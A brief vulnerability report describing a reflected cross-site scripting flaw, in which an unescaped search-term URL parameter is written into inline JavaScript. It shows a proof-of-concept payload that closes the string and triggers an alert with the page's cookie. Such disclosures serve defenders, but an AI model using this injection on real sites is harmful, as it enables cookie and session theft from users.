XSS vulnerability through a URL parameter
An attacker can send a user to a malicious URL that has the search term parameter with some JavaScript that gets rendered and executed on the page as is.
The search term is not escaped or encoded in anyway so you can terminate the variable and add any arbitrary JS. The example below shows an alert dialog being triggered with the browser's cookie.
<script type="text/javascript" language="javascript"> //<![CDATA[
var promptText = '';
$(document).ready(function()
{
promptText = '';alert(document.cookie);//';
$('#helpsearchterms').val(promptText);
});
$('#helpsearchterms').click(function () {
if ($(this).val() == promptText) {
$(this).val('');
}
});
</script>
Reported Fixed Unknown
Back